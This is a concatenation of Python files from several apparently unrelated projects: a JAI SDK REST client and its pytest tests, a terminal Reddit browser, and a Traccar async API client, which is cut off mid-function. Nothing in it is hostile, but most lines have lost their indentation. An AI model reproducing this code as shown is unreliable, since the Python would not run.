f"id_item param must be int or list, `{id_item.__class__.__name__}` found."
)
filtering = "" if filters is None else "".join(
["&filters=" + s for s in filters])
url = self.url + f"/similar/id/{name}?top_k={top_k}" + filtering
return requests.put(
url,
headers=self.header,
json=id_item,
)
@raise_status_error(200)
def _similar_json(self,
name: str,
data_json,
top_k: int = 5,
filters=None):
"""
        Creates a list of dicts with the index and distance of the k most similar items, given a JSON data entry.
This is a protected method
Args
----
name : str
String with the name of a database in your JAI environment.
data_json : dict (JSON)
Data in JSON format. Each input in the dictionary will be used to search for the `top_k` most
similar entries in the database.
top_k : int
Number of k similar items we want to return. `Default is 5`.
Return
------
response : dict
Dictionary with the index and distance of `the k most similar items`.
"""
filtering = "" if filters is None else "".join(
["&filters=" + s for s in filters])
url = self.url + f"/similar/data/{name}?top_k={top_k}" + filtering
header = copy(self.header)
header['Content-Type'] = "application/json"
return requests.put(url, headers=header, data=data_json)
@raise_status_error(200)
def _predict(self, name: str, data_json, predict_proba: bool = False):
"""
Predict the output of new data for a given database by calling its
        respective API method. This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
data_json : JSON file (dict)
            Data to be inferred by the previously trained model.
predict_proba : bool
Whether or not to return the probabilities of each prediction. `Default is False`.
Return
-------
results : dict
            Dictionary of predictions for the data passed as parameter.
"""
url = self.url + \
f"/predict/{name}?predict_proba={predict_proba}"
header = copy(self.header)
header['Content-Type'] = "application/json"
return requests.put(url, headers=header, data=data_json)
@raise_status_error(200)
def _ids(self, name: str, mode: Mode = "simple"):
"""
Get id information of a given database.
        Args
        ----
        name : str
            String with the name of a database in your JAI environment.
        mode : str, optional
            Level of detail to return. Possible values are 'simple', 'summarized' or 'complete'.
Return
-------
response: list
List with the actual ids (mode: 'complete') or a summary of ids
('simple'/'summarized') of the given database.
Example
----------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> ids = j.ids(name)
>>> print(ids)
['891 items from 0 to 890']
"""
return requests.get(self.url + f"/id/{name}?mode={mode}",
headers=self.header)
@raise_status_error(200)
def _is_valid(self, name: str):
"""
Check if a given name is a valid database name (i.e., if it is in your environment).
Args
----
`name`: str
String with the name of a database in your JAI environment.
Return
------
response: bool
True if name is in your environment. False, otherwise.
"""
return requests.get(self.url + f"/validation/{name}",
headers=self.header)
@raise_status_error(202)
def _append(self, name: str):
"""
Add data to a database that has been previously trained.
This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with the API response.
"""
return requests.patch(self.url + f"/data/{name}", headers=self.header)
@raise_status_error(200)
def _insert_json(self, name: str, data_json, filter_name: str = None):
"""
Insert data in JSON format. This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
data_json : dict
Data in JSON format.
Return
------
response : dict
Dictionary with the API response.
"""
filtering = "" if filter_name is None else f"?filter_name={filter_name}"
url = self.url + f"/data/{name}" + filtering
header = copy(self.header)
header['Content-Type'] = "application/json"
return requests.post(url, headers=header, data=data_json)
@raise_status_error(201)
def _setup(self, name: str, body, overwrite=False):
"""
Call the API method for database setup.
This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
db_type : str
Database type (Supervised, SelfSupervised, Text...)
overwrite : bool
[Optional] Whether of not to overwrite the given database. `Default is False`.
**kwargs:
Any parameters the user wants to (or needs to) set for the given datase. Please
refer to the API methods to see the possible arguments.
Return
-------
response : dict
Dictionary with the API response.
"""
overwrite = json.dumps(overwrite)
return requests.post(
self.url + f"/setup/{name}?overwrite={overwrite}",
headers=self.header,
json=body,
)
@raise_status_error(200)
def _report(self, name, verbose: int = 2):
"""
Get a report about the training model.
Parameters
----------
name : str
String with the name of a database in your JAI environment.
verbose : int, optional
Level of description. The default is 2.
Use verbose 2 to get the loss graph, verbose 1 to get only the
metrics result.
Returns
-------
dict
Dictionary with the information.
"""
return requests.get(self.url + f"/report/{name}?verbose={verbose}",
headers=self.header)
@raise_status_error(200)
def _temp_ids(self, name: str, mode: Mode = "simple"):
"""
Get id information of a RAW database (i.e., before training). This is a protected method
Args
----
name : str
String with the name of a database in your JAI environment.
mode : str, optional
Level of detail to return. Possible values are 'simple', 'summarized' or 'complete'.
Return
-------
response: list
List with the actual ids (mode: 'complete') or a summary of ids
('simple'/'summarized') of the given database.
"""
return requests.get(self.url + f"/setup/ids/{name}?mode={mode}",
headers=self.header)
@raise_status_error(200)
def _fields(self, name: str):
"""
Get the table fields for a Supervised/SelfSupervised database.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with table fields.
"""
return requests.get(self.url + f"/fields/{name}", headers=self.header)
@raise_status_error(200)
def _describe(self, name: str):
"""
Get the database hyperparameters and parameters of a specific database.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with database description.
"""
return requests.get(self.url + f"/describe/{name}",
headers=self.header)
@raise_status_error(200)
def _cancel_setup(self, name: str):
"""
        Cancel a database setup (model training) that is still in progress.
        Args
        ----
        name : str
            String with the name of a database in your JAI environment.
        Return
        ------
        response : dict
            Dictionary with the API response.
"""
return requests.post(self.url + f'/cancel/{name}', headers=self.header)
@raise_status_error(200)
def _delete_ids(self, name, ids):
"""
Delete the specified ids from database.
Args
----
name : str
String with the name of a database in your JAI environment.
ids : list
List of ids to be removed from database.
Return
-------
response : dict
Dictionary with the API response.
Example
----------
        >>> name = 'chosen_name'
        >>> ids_to_remove = [1, 2, 3]
        >>> j = Jai(AUTH_KEY)
        >>> j.delete_ids(name, ids_to_remove)
"""
return requests.delete(self.url + f"/entity/{name}",
headers=self.header,
json=ids)
@raise_status_error(200)
def _delete_raw_data(self, name: str):
"""
Delete raw data. It is good practice to do this after training a model.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
-------
response : dict
Dictionary with the API response.
Example
----------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> j.delete_raw_data(name=name)
'All raw data from database 'chosen_name' was deleted!'
"""
return requests.delete(self.url + f"/data/{name}", headers=self.header)
@raise_status_error(200)
def _delete_database(self, name: str):
"""
Delete a database and everything that goes with it (I thank you all).
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with the API response.
Example
-------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> j.delete_database(name=name)
'Bombs away! We nuked database chosen_name!'
"""
return requests.delete(self.url + f"/database/{name}",
headers=self.header)
```
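A minimal sketch of driving the low-level client above directly; the URL and key mirror the constants used by the test modules later in this listing, and a locally running JAI backend is assumed:
```python
from jai.base import BaseJai

client = BaseJai(auth_key="sdk_test", url="http://localhost:8001")
print(client.url)        # base endpoint used by every request
print(client._info())    # name and type of each database in the environment
print(client._status())  # current setup/training status
```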
#### File: jai/functions/classes.py
```python
from enum import Enum
__all__ = ['FieldName', 'Mode', 'PossibleDtypes']
class PossibleDtypes(str, Enum):
image = "Image"
fasttext = "FastText"
selfsupervised = "SelfSupervised"
supervised = "Supervised"
text = "Text"
edit = "TextEdit"
class FieldName(str, Enum):
text = "text"
image = "image_base64"
def __str__(self):
return str(self.value)
class Mode(str, Enum):
complete = "complete"
summarized = "summarized"
simple = "simple"
```
#### File: jai/tests/test_zapi_applications.py
```python
from jai import Jai
from pandas.api.types import infer_dtype
from .test_utils import setup_dataframe
import pandas as pd
import numpy as np
import pytest
URL = 'http://localhost:8001'
AUTH_KEY = "sdk_test"
np.random.seed(42)
# =============================================================================
# Test Embedding
# =============================================================================
@pytest.mark.parametrize("name", ["test_embedding"])
def test_embedding(name, setup_dataframe):
train, test = setup_dataframe
train = train.rename(columns={
"PassengerId": "id"
}).set_index("id")['Name'].iloc[:10]
test = test.rename(columns={
"PassengerId": "id"
}).set_index("id")['Name'].iloc[:10]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.embedding(name, train, overwrite=True)
assert j.is_valid(name), f"valid name {name} after train embedding"
j.embedding(name, test)
assert j.is_valid(name), f"valid name {name} after test embedding"
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Fill
# =============================================================================
@pytest.mark.parametrize("name", ["test_fill"])
def test_fill(name, setup_dataframe):
train, test = setup_dataframe
train = train.set_index("PassengerId").iloc[:10]
test = test.set_index("PassengerId").iloc[:10]
half = test.shape[0] // 2
data = pd.concat([train, test.iloc[:half]])
j = Jai(url=URL, auth_key=AUTH_KEY)
for n in j.names:
if n.startswith(name):
j.delete_database(n)
x = j.fill(name, data, column="Survived")
assert j.is_valid(name), f"valid name {name} after train fill"
assert j.ids(name) == ['15 items from 1 to 896'], 'wrong ids values sanity'
v = j.fill(name, test.iloc[half:], column="Survived")
assert j.ids(name) == ['20 items from 1 to 901'], 'wrong ids values sanity'
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Sanity
# =============================================================================
@pytest.mark.parametrize("name", ["test_sanity"])
def test_sanity(name, setup_dataframe):
train, test = setup_dataframe
train = train.set_index("PassengerId").iloc[:50]
test = test.set_index("PassengerId").iloc[:50]
half = test.shape[0] // 2
data = pd.concat([train, test.iloc[:half]]).drop(columns=['Survived'])
j = Jai(url=URL, auth_key=AUTH_KEY)
for n in j.names:
if n.startswith(name):
j.delete_database(n)
x = j.sanity(name, data)
assert j.is_valid(name), f"valid name {name} after train sanity"
v = j.sanity(name, test.iloc[half:])
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Match Application
# =============================================================================
@pytest.mark.parametrize("name", ["test_match"])
def test_match(name):
A = [
"Apple", "Watermelon", "Orange", "Nectarine", "Grape", "Lemon",
"Blueberry", "Pomegranate", "Banana", "Papaya", "Pineapple",
"Grapefruit", "Coconut", "Avocado", "Peach"
]
B = [
'Coconit', 'Pdach', 'Appld', 'Piheapplr', 'Banxna', 'Avocado', 'Grwpe'
]
expected = [12, 14, 0, 10, 8, 13, 4]
data_left = pd.Series(A)
data_right = pd.Series(B)
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
ok = j.match(name,
data_left,
data_right,
top_k=15,
threshold=0.5,
original_data=True)
assert ok['id_left'].tolist() == expected, "match failed"
# =============================================================================
# Test Resolution Application
# =============================================================================
@pytest.mark.parametrize("name", ["test_resolution"])
def test_resolution(name):
data = [
"Apple", "Watermelon", "Orange", "Strawberry", "Nectarine", "Grape",
"Blueberry", "Pomegranate", "Banana", "Raspberry", "Papaya",
"Pineapple", "Lemon", "Grapefruit", "Coconut", "Avocado", "Peach",
'Coconit', 'Pdach', 'Appld', 'Piheapplr', 'Banxna', 'Avocado', 'Grwpe',
'Grapw', 'Bluebeffy', 'Banwna', 'Strzwherry', 'Gdapefruir',
'Aatermelon', 'Piheaplle', 'Grzpe', 'Watermelon', 'Kemon', 'Bqnana',
'Bljwberry', 'Rsspherry', 'Bahana', 'Watrrmeloh', 'Pezch', 'Blusberrt',
'Grapegruit', 'Avocaeo'
]
expected = np.arange(19)
data = pd.Series(data)
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
ok = j.resolution(name, data, top_k=20, threshold=.4, original_data=True)
assert ok['resolution_id'].isin(expected).all(), "resolution failed"
```
#### File: jai/tests/test_zjai_models.py
```python
from jai import Jai
from .test_utils import setup_dataframe
import pandas as pd
import numpy as np
import pytest
URL = 'http://localhost:8001'
AUTH_KEY = "sdk_test"
MAX_SIZE = 50
np.random.seed(42)
# =============================================================================
# Test Text
# =============================================================================
@pytest.mark.parametrize("name,dtype", [("test_nlp", "Text"),
("test_fasttext", "FastText"),
("test_edittext", "TextEdit")])
def test_text(name, dtype, setup_dataframe):
train, _ = setup_dataframe
train = train.rename(columns={
"PassengerId": "id"
}).set_index("id")['Name'].iloc[:MAX_SIZE]
ids = train.index.tolist()
query = train.loc[np.random.choice(ids, 10, replace=False)]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.setup(name, train, db_type=dtype, overwrite=True)
assert j.is_valid(name), f"valid name {name} after setup failed"
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert sorted(j.ids(name, 'complete')) == ids, "ids complete failed"
result = j.similar(name, query)
assert isinstance(result, list), "similar data result failed"
result = j.similar(name, pd.Series(query.index))
assert isinstance(result, list), "similar id series result failed"
result = j.similar(name, query.index)
assert isinstance(result, list), "similar id index result failed"
result = j.similar(name, query.index.tolist())
assert isinstance(result, list), "similar id list result failed"
result = j.similar(name, query.index.values)
assert isinstance(result, list), "similar id array result failed"
# try to use the fields method on a text database
# this will raise an exception
with pytest.raises(ValueError):
j.fields(name)
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Self-supervised
# =============================================================================
def test_selfsupervised(setup_dataframe):
name = 'test_selfsupervised'
train, _ = setup_dataframe
train = train.drop(columns=["PassengerId"]).iloc[:MAX_SIZE]
query = train.loc[np.random.choice(len(train), 10, replace=False)]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.setup(name,
train,
db_type="SelfSupervised",
hyperparams={"max_epochs": 3},
overwrite=True)
assert j.is_valid(name), f"valid name {name} after setup failed"
ids = train.index.tolist()
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert j.ids(name, 'complete') == ids, "ids complete failed"
for k, from_api in j.fields(name).items():
if k == 'id':
continue
original = str(train[k].dtype)
if original == 'object':
original = 'string'
        assert original == from_api, f"dtype from api {from_api} differs from data {original}"
result = j.similar(name, query)
# try to use j.predict on a self-supervised database
# this will raise an exception
with pytest.raises(ValueError):
j.predict(name, dict())
assert isinstance(result, list), "similar result failed"
# try to set up the same database again
# without overwriting it
with pytest.raises(KeyError):
j.setup(name, train, db_type="SelfSupervised")
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Supervised
# =============================================================================
def test_supervised(setup_dataframe):
name = 'test_supervised'
train, test = setup_dataframe
train = train.rename(columns={"PassengerId": "id"}).iloc[:MAX_SIZE]
test = test.rename(columns={"PassengerId": "id"}).iloc[:MAX_SIZE]
query = test.loc[np.random.choice(len(test), 10, replace=False)]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.fit(name,
train,
db_type="Supervised",
overwrite=True,
hyperparams={"max_epochs": 3},
label={
"task": "metric_classification",
"label_name": "Survived"
},
split={
"type": 'stratified',
"split_column": "Survived",
"test_size": .2
})
assert j.is_valid(name), f"valid name {name} after setup failed"
ids = train['id'].tolist()
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert j.ids(name, 'complete') == ids, "ids complete failed"
for k, from_api in j.fields(name).items():
if k == 'Survived':
continue
original = str(train[k].dtype)
if original == 'object':
original = 'string'
        assert original == from_api, f"dtype from api {from_api} differs from data {original}"
result = j.similar(name, query)
assert isinstance(result, list), "similar result failed"
result = j.predict(name, query)
# since we have a supervised database already inplace
# we test one of its exceptions
with pytest.raises(ValueError):
j.predict(name, dict())
assert isinstance(result, list), "predict result failed"
j.append(name, test)
ids = train['id'].tolist() + test['id'].tolist()
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert j.ids(name, 'complete') == ids, "ids complete failed"
# test _delete_tree method here
j._delete_tree(name)
assert not j.is_valid(name), "valid name after delete failed"
``` |
{
"source": "jquast/redterm",
"score": 3
} |
#### File: redterm/redterm/__main__.py
```python
import argparse
import logging
import os
import yaml
import redterm.browser
import redterm.pages
import redterm.terminal
logging.basicConfig(filename="./redterm.debug.log", level=logging.DEBUG, filemode="w")
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument('-s', '--subreddit', nargs=1, help='Go to specified subreddit')
arguments = argument_parser.parse_args()
# Load settings
dir_config = os.environ['HOME'] + '/.redterm/'
file_config = dir_config + 'config.yml'
try:
with open(file_config, 'r') as file:
        config = yaml.safe_load(file)
except OSError:
if not os.path.exists(dir_config):
os.makedirs(dir_config)
yaml.dump({'browser': 'lynx', 'subreddits': ['letsnotmeet', 'python']}, open(file_config, 'w'))
with open(file_config, 'r') as file:
        config = yaml.safe_load(file)
logging.debug(config['browser'])
logging.debug(config['subreddits'])
def main():
"""First entry point."""
terminal_io = redterm.terminal.IO()
if arguments.subreddit:
subreddit_title = arguments.subreddit[0]
else:
subreddit_title = 'frontpage'
with terminal_io.setup():
page = redterm.pages.PageSubreddit(subreddit_title, redterm.terminal.terminal.width)
terminal_io.pages.append(page)
while True:
page_current = terminal_io.pages[-1]
item_selected = page_current.items[page_current.item_selected]
terminal_io.status_text = 'Viewing.'
terminal_io.render()
# Controls
key_pressed = terminal_io.get_key(1)
if key_pressed.code == redterm.terminal.KEY_UP or key_pressed == 'k':
terminal_io.select_item_prev()
elif key_pressed.code == redterm.terminal.KEY_DOWN or key_pressed == 'j':
# If in subreddit mode, download remaining items if at last item
if type(page_current) is redterm.pages.PageSubreddit:
if page_current.item_selected == len(page_current.items) - 1:
terminal_io.status_text = 'Loading...'
terminal_io.render()
terminal_io.pages[-1].update()
terminal_io.reset()
terminal_io.status_text = 'Viewing.'
terminal_io.select_item_next()
elif key_pressed.code == redterm.terminal.KEY_PGUP:
terminal_io.select_item_prevscreen()
elif key_pressed.code == redterm.terminal.KEY_PGDN:
terminal_io.select_item_nextscreen()
elif key_pressed.code == redterm.terminal.KEY_ENTER:
terminal_io.status_text = 'Loading...'
terminal_io.render()
try:
new_page = redterm.pages.PageSubmission(item_selected, terminal_io.terminal_width)
terminal_io.pages.append(new_page)
terminal_io.status_text = 'Viewing.'
terminal_io.reset()
except AttributeError:
pass
finally:
terminal_io.status_text = 'Viewing.'
elif key_pressed == 'o':
try:
url = item_selected.url
redterm.browser.open_browser(config['browser'], url)
except AttributeError:
# Items such as comments have no url, so do nothing
pass
elif key_pressed.code == redterm.terminal.KEY_BACKSPACE:
terminal_io.status_text = 'Loading...'
terminal_io.render()
if len(terminal_io.pages) > 1:
del terminal_io.pages[-1]
terminal_io.reset()
terminal_io.status_text = 'Viewing.'
elif key_pressed.code == redterm.terminal.KEY_ESCAPE:
break
elif not key_pressed:
pass
#logging.debug(key_pressed.code)
if __name__ == '__main__':
main()
```
#### File: redterm/redterm/pages.py
```python
import logging
import re
from urllib.parse import urlparse
import blessed
import praw
import redterm.__init__
terminal = blessed.Terminal()
reddit_api = praw.Reddit(user_agent='desktop:https://github.com/owlowlgo/redterm:' + redterm.__init__.__version__) # TODO Add version
LIMIT = 25 # TODO put this in config file
class PageBase:
"""Base class for how items are to be displayed and selected."""
def __init__(self, name, width, indent=2):
self.name = name
self.items = [] # Items to be displayed on page, such as Submission and Comment objects
self.item_strings = [] # Actual text to be displayed
self._item_strings_formatted = [] # Formatted version of above
self.item_onscreenlocs = [] # Index of locations of items in the buffer
self._item_selected = 0 # Currently selected item
self.item_indentations = [] # Index of indentation level of items
self.width = width # Width of page
self.indent = indent # Indent page by this value
@property
def item_strings_formatted(self):
"""Process items to display to be wrapped according to current terminal size."""
#if self._item_strings_formatted and self.width == terminal.width:
# return self._item_strings_formatted
# Reset current wrapped item info
self._item_strings_formatted = []
self.item_onscreenlocs = []
        # Take each item to display by line, and break it into multiple lines based on the current terminal width
line_no = 0
for item_no, item_display in enumerate(self.item_strings):
# Confirm indentation level for each item
try:
item_indentation = self.item_indentations[item_no] * 2
except IndexError:
item_indentation = 0
finally:
indentation = self.indent + item_indentation
# Save location of each new broken down line
self.item_onscreenlocs.append(line_no)
for item_display_line in item_display.splitlines():
item_width = self.width - indentation - 1 # Width of item is width of page, minus item indentation, and minus an extra character for the trailing '│' symbol
for line in terminal.wrap(item_display_line, item_width):
if indentation > 1:
line = terminal.bold_white_on_black(' ' * indentation + '│' + line)
else:
line = terminal.bold_white_on_black(' ' * indentation + line)
self._item_strings_formatted.append(line)
line_no += 1
# Add extra blank line under item
line = terminal.bold_white_on_black(' ' * self.width)
self._item_strings_formatted.append(line)
line_no += 1
return self._item_strings_formatted
@property
def item_selected(self):
"""Return currently selected item index."""
return self._item_selected
@item_selected.setter
def item_selected(self, potential_item_selected):
"""Safely update selected item index."""
if 0 <= potential_item_selected < len(self.items):
self._item_selected = potential_item_selected
class PageSubreddit(PageBase):
"""Holds information on how to display subreddit."""
def __init__(self, subreddit_title, width, indent=2):
self.subreddit_title = subreddit_title
PageBase.__init__(self, '/r/' + self.subreddit_title, width, indent=2)
self.submissions = reddit_api.get_subreddit(self.subreddit_title).get_hot(limit=1000)
for i in range(LIMIT):
self.items.append(next(self.submissions))
self.prepare_text()
def prepare_text(self):
"""pass"""
self.item_strings = []
for item_no, item in enumerate(self.items, 1):
self.item_strings.append(terminal.bold_white_on_black(str(item_no) + '. ') +
terminal.bold_white_on_black(str(item.title) + ' (') +
terminal.blue_on_black('{uri.netloc}'.format(uri=urlparse(item.url))) + terminal.bold_white_on_black(')') + '\n' +
terminal.bold_white_on_black(str(item.score) + 'pts ') +
terminal.bold_white_on_black(str(item.num_comments) + ' comments by ') +
terminal.cyan_on_black(str(item.author)) + terminal.bold_white_on_black(' ') +
terminal.cyan_on_black('/r/' + str(item.subreddit)) + '\n')
def update(self):
"""pass"""
for i in range(LIMIT):
try:
self.items.append(next(self.submissions))
except StopIteration:
pass
self.prepare_text()
#derivatives = ('on', 'bright', 'on_bright',)
#colors = set('black red green yellow blue magenta cyan white'.split())
class PageSubmission(PageBase):
"""Holds information on how to display a submission along with comments."""
def __init__(self, submission, width, indent=2):
PageBase.__init__(self, '/r/' + str(submission.subreddit) + '/' + submission.title, width, indent=2)
self.submission = submission
self.item_strings.append(terminal.bold(str(self.submission.title)) + '(' +
terminal.underline_blue('{uri.netloc}'.format(uri=urlparse(self.submission.url))) + ')\n' +
str(self.submission.score) + 'pts ' +
str(self.submission.num_comments) + ' comments by (' +
terminal.underline_cyan(str(self.submission.author)) + ')' +
str(re.sub('\n\s*\n', '\n\n', self.submission.selftext)) + '\n')
for comment in praw.helpers.flatten_tree(submission.comments):
self.items.append(comment)
self.item_indentations = self._get_comment_depth(self.submission, self.items)
for item_no, item in enumerate(self.items):
try:
self.item_strings.append(terminal.white_on_black('* ') + terminal.cyan_on_black(str(item.author)) + ' ' +
str(item.score) + 'pts \n' +
str(item.body) + '\n')
except AttributeError:
self.item_strings.append('* ' + terminal.underline_blue('More comments...'))
self.items = [self.submission] + self.items # TODO This is ugly. Need refactor.
def update(self):
"""pass"""
pass
@staticmethod
def _get_comment_depth(submission, comments):
"""pass"""
comment_depth = [0]
comment_indentation_depth = 0
comment_indentation_depth_ids = [submission.id]
for comment in comments:
if comment.parent_id[3:] in comment_indentation_depth_ids:
comment_indentation_depth = comment_indentation_depth_ids.index(comment.parent_id[3:])
comment_indentation_depth_ids = comment_indentation_depth_ids[0:comment_indentation_depth + 1]
else:
comment_indentation_depth += 1
comment_indentation_depth_ids.append(comment.parent_id[3:])
comment_depth.append(comment_indentation_depth)
return comment_depth
```
#### File: redterm/redterm/terminal.py
```python
import contextlib
import logging
import signal
import sys
import blessed
terminal = blessed.Terminal()
# Key codes used in application.
KEY_DOWN = 258
KEY_UP = 259
KEY_LEFT = 260
KEY_RIGHT = 261
KEY_BACKSPACE = 330
KEY_PGDN = 338
KEY_PGUP = 339
KEY_ENTER = 343
KEY_ESCAPE = 361
class IO:
"""Handles rendering of Page objects."""
def __init__(self):
self.pages = [] # List of all Page-related objects generated for session.
self.page_current = 0 # Keep track of current(last) page.
self.render_buffer = [] # Render buffer. Holds entire page to display.
self.render_offset = 0 # Offset to keep track of where in render buffer to render from.
self.render_offset_item = 0 # Extra offset to put in account of items which do not fit terminal size.
self.terminal_width = 0 # Remember terminal width.
self.terminal_height = 0 # Remember terminal height.
self.status_text = ''
# Initialize terminal
print(terminal.enter_fullscreen)
print(terminal.clear)
# Init signal for terminal resize event.
signal.signal(signal.SIGWINCH, self.on_resize)
def render(self):
"""Render last page while keeping in account of key press updates and resizing."""
self.page_current = self.pages[-1]
# Remember terminal size.
self.terminal_width = terminal.width
self.terminal_height = terminal.height - 1
# Do not render if no items exist in page yet.
if not self.page_current.items:
return
# Fill buffer with content if empty.
if not self.render_buffer:
for line in self.page_current.item_strings_formatted:
line += terminal.on_black(' ' * (self.terminal_width - terminal.length(line)))
self.render_buffer.append(line)
self.render_offset = self.page_current.item_onscreenlocs[self.page_current.item_selected]
# Adjust the rendering offset if selected menu item is out of bounds of current terminal.
if self.page_current.item_onscreenlocs[self.page_current.item_selected] >= self.render_offset + self.terminal_height:
self.render_offset += self.terminal_height
elif self.page_current.item_onscreenlocs[self.page_current.item_selected] < self.render_offset:
self.render_offset -= self.terminal_height
if self.render_offset < 0:
self.render_offset = 0
# Render buffer content to terminal
for buffer_line_no in range(self.terminal_height):
try:
buffer_line = self.render_buffer[self.render_offset + self.render_offset_item + buffer_line_no]
print(terminal.move(buffer_line_no, 0) + buffer_line, end='')
except IndexError:
# Print blank line in case buffer is empty
print(terminal.move(buffer_line_no, 0) + (terminal.on_black(' ' * self.terminal_width)), end='')
# Render status
print(terminal.move(self.terminal_height, 0) + (terminal.black_on_cyan(self.status_text + ' ' * (self.terminal_width - terminal.length(self.status_text)))), end='')
# Render cursor.
# TODO Need to fix bug where the cursor occasionally gets drawn outside the screen and disrupting the rendering process
if self.render_offset_item == 0:
cursor = terminal.white_on_black('>')
try:
cursor += terminal.white_on_black('-' * (self.page_current.item_indentations[self.page_current.item_selected] * 2))
except IndexError:
pass
print(terminal.move(self.page_current.item_onscreenlocs[self.page_current.item_selected] - self.render_offset, 0) + cursor)
def on_resize(self, *args):
"""Re-perform wrapping of text to accommodate new terminal size."""
self.page_current.width = terminal.width # Give page new terminal width
self.render_buffer = []
self.render() # Re-render buffer
def reset(self):
"""Empty render buffer and repopulate it with current page."""
# TODO Need to redo this so that it doesn't scrap cached page data each time this is run.
self.page_current = self.pages[-1]
self.page_current.width = terminal.width # Give page new terminal width
self.render_buffer = []
#self.render_offset = 0
#self.render_offset_item = 0
self.render()
def _get_distance_betweenitems(self, item_no1, item_no2):
"""Determine distance between 2 items does not fit terminal height"""
try:
if item_no1 >= 0 and item_no2 >= 0:
loc_current = self.page_current.item_onscreenlocs[item_no1]
loc_potential = self.page_current.item_onscreenlocs[item_no2]
distance = abs(loc_potential - loc_current)
else:
distance = 0
except IndexError:
distance = 0
return distance
def select_item_next(self):
"""Determine whether to render the next item, or just adjust self.render_offset_item."""
# If current item fits terminal height choose next item,
# if not, adjust render_offset_item without selecting new item(Edge case)
loc_diff = self._get_distance_betweenitems(self.page_current.item_selected, self.page_current.item_selected + 1)
if loc_diff - self.render_offset_item < self.terminal_height:
self.page_current.item_selected += 1
self.render_offset_item = 0
else:
self.render_offset_item += self.terminal_height
self.render() # TODO Why the render function needs to be called for instant update unknown. Need to look into.
def select_item_prev(self):
"""Determine whether to render the previous item, or just adjust self.render_offset_item."""
loc_diff = self._get_distance_betweenitems(self.page_current.item_selected, self.page_current.item_selected - 1)
if loc_diff + self.render_offset_item < self.terminal_height:
self.page_current.item_selected -= 1
self.render_offset_item = 0
else:
self.render_offset_item -= self.terminal_height
self.render() # TODO Why the render function needs to be called for instant update unknown. Need to look into.
def select_item_nextscreen(self):
"""pass"""
self.page_current.item_selected = self._get_out_of_screen_item_loc_next()
def select_item_prevscreen(self):
"""pass"""
self.page_current.item_selected = self._get_out_of_screen_item_loc_prev()
def _get_out_of_screen_item_loc_next(self):
"""Returns closest item index on next page."""
new_loc = self.page_current.item_onscreenlocs[self.page_current.item_selected] + self.terminal_height + 1
closest_item_index = self._get_index_closest_val(self.page_current.item_onscreenlocs, new_loc)
return closest_item_index
def _get_out_of_screen_item_loc_prev(self):
"""Returns closest item index on previous page."""
new_loc = self.page_current.item_onscreenlocs[self.page_current.item_selected] - self.terminal_height
closest_item_index = self._get_index_closest_val(self.page_current.item_onscreenlocs, new_loc)
return closest_item_index
@staticmethod
def _get_index_closest_val(list, val):
"""Return index of closest value within list."""
return min(range(len(list)), key=lambda i: abs(list[i]-val))
@contextlib.contextmanager
def setup(self):
"""Set up required terminal modes."""
try:
with terminal.cbreak(), terminal.hidden_cursor():
yield
finally:
print(terminal.clear)
print(terminal.exit_fullscreen)
@staticmethod
def get_key(timeout=0):
"""Returns input object."""
return terminal.inkey(timeout=timeout)
``` |
{
"source": "jquatier/pytraccar",
"score": 3
} |
#### File: jquatier/pytraccar/example.py
```python
import asyncio
import aiohttp
from pytraccar.api import API
HOST = '192.168.2.11'
async def test():
"""Example usage of pytraccar."""
async with aiohttp.ClientSession() as session:
data = API(LOOP, session, 'admin', 'admin', HOST)
await data.get_device_info()
print("Device info:", data.device_info)
LOOP = asyncio.get_event_loop()
LOOP.run_until_complete(test())
```
#### File: pytraccar/pytraccar/api.py
```python
import asyncio
import logging
import socket
import aiohttp
import async_timeout
_LOGGER = logging.getLogger(__name__)
HEADERS = {'Content-Type': 'application/json', 'Accept': 'application/json'}
class API(object):
"""A class for the Traccar API."""
def __init__(self, loop, session, username, password,
host, port=8082, ssl=False):
"""Initialize the class."""
self._loop = loop
self._auth = aiohttp.BasicAuth(username, password)
schema = 'https' if ssl else 'http'
self._api = schema + '://' + host + ':' + str(port) + '/api'
self._session = session
self._authenticated = False
self._geofences = {}
self._devices = []
self._positions = []
self._device_info = {}
async def test_connection(self):
"""Get the local installed version."""
base_url = self._api + '/devices'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
if response.status == 200:
self._authenticated = True
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
